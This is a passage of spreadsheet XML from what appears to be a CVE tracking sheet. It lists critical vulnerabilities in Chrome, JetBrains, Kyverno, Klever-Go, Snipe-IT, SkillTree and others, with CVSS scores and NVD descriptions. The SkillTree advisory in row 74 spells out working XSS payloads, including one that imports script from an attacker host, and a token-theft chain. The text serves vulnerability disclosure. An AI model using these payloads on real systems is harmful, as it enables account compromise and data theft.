          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _get_dell_system_info_idrac_info in ipmi-oem/ipmi-oem-dell.c (idrac-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85506</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86478</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2025.3.161254, 
2026.1.14042 improper authentication in YouTrack Helpdesk allowed unauthenticated account takeover via a self-asserted email address</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86478</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86480</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52442 an unauthenticated attacker could register a trusted service and gain superuser privileges</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86480</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87534</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87534</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87544</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87544</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87595</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery in Mobile in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87595</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53649</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-434, CWE-942</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>Joro is a web exploitation framework. Prior to version 1.1.1, Joro's default proxy mode exposes a local API on 127.0.0.1:9090 that performs no authentication and applies a wildcard CORS policy. Because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript on any page the operator visits can reach privileged endpoints - including uploading a native plugin and triggering a restart - directly through the operator's browser, with no preflight or credentials. Since plugins execute on load, this yields unauthenticated remote code execution as the operator's user from a single page visit. This issue has been patched in version 1.1.1.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53649</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54523</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>Kyverno is a policy engine designed for cloud native platform engineering teams. From 1.18.0 until 1.18.2, the NamespacedMutatingPolicy CEL compiler exposes the generator library to matchConditions, allowing a namespace-scoped policy to invoke generator.apply(namespace, resources) with an arbitrary target namespace. The validation in pkg/cel/policies/mpol/validate.go checks that the policy compiles but does not enforce namespace scope, and GenerateResources in pkg/cel/libs/context.go does not reject the cross-namespace target. A user who can create NamespacedMutatingPolicy objects in one namespace can cause the admission controller, operating with cluster-wide privileges, to create ConfigMaps, NetworkPolicies, Secrets, RoleBindings, and other resources in another namespace, enabling unauthorized modification and potential privilege escalation. This issue is fixed in version 1.18.2.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54523</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54694</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-183, CWE-20, CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "&lt;img src=x onerror=alert(1)&gt;"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `&lt;img src=x onerror=alert(1)&gt;`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "&lt;img src=x"`, `firstName = "onerror=import('//nsas.cc/p')&gt;"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54694</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54754</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367, CWE-682</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, marketplace settlement in core/kapp/market/market.go reads MarketOrderData.ReferralPercentage from the listing while reading asset.Royalties.MarketPercentage live at purchase time. An asset owner can create a valid listing and then use AssetTrigger UpdateRoyalties to make the combined referral and royalty percentages exceed the bid. executeBuyMarket pays referral and royalty amounts unconditionally while computeMarketOwnerAmount silently skips a nonpositive seller remainder, allowing MarketBuy, BuyItNow, or auction Claim settlement to credit more KLV or sale currency than the buyer paid. This can create unbacked currency and corrupt token supply integrity. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54754</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54755</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, split-royalty fields decoded in core/kapp/builtInFunctions/utils.go can contain values greater than core.HundredPercent, and core/kapp/kda/create.go and core/kapp/kda/trigger.go sum those values in uint32 accumulators. Crafted values such as two 0x80000000 entries wrap the validation sum to zero and pass CheckValid100Params. Royalty payout paths in core/kapp/accounts/accounts.go, core/kapp/market/market.go, and core/kapp/ito/ito.go then credit each oversized split amount and silently discard a negative remainder, allowing ordinary asset transfers, marketplace purchases, or ITO purchases to create unbacked KLV or other assets. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54755</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86751</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly sanitize markdown image syntax in note fields, allowing authenticated users to read arbitrary server files and issue server-side HTTP requests. Attackers can submit markdown image syntax in checkout acceptance notes that survive HTML escaping, are expanded by CommonMark parser, and resolved by laravel-mail-auto-embed via file_get_contents or curl, exfiltrating sensitive files like .env containing APP_KEY.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86751</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87438</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87438</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87448</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87448</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87455</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>Use after free in Aura in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87455</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87464</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
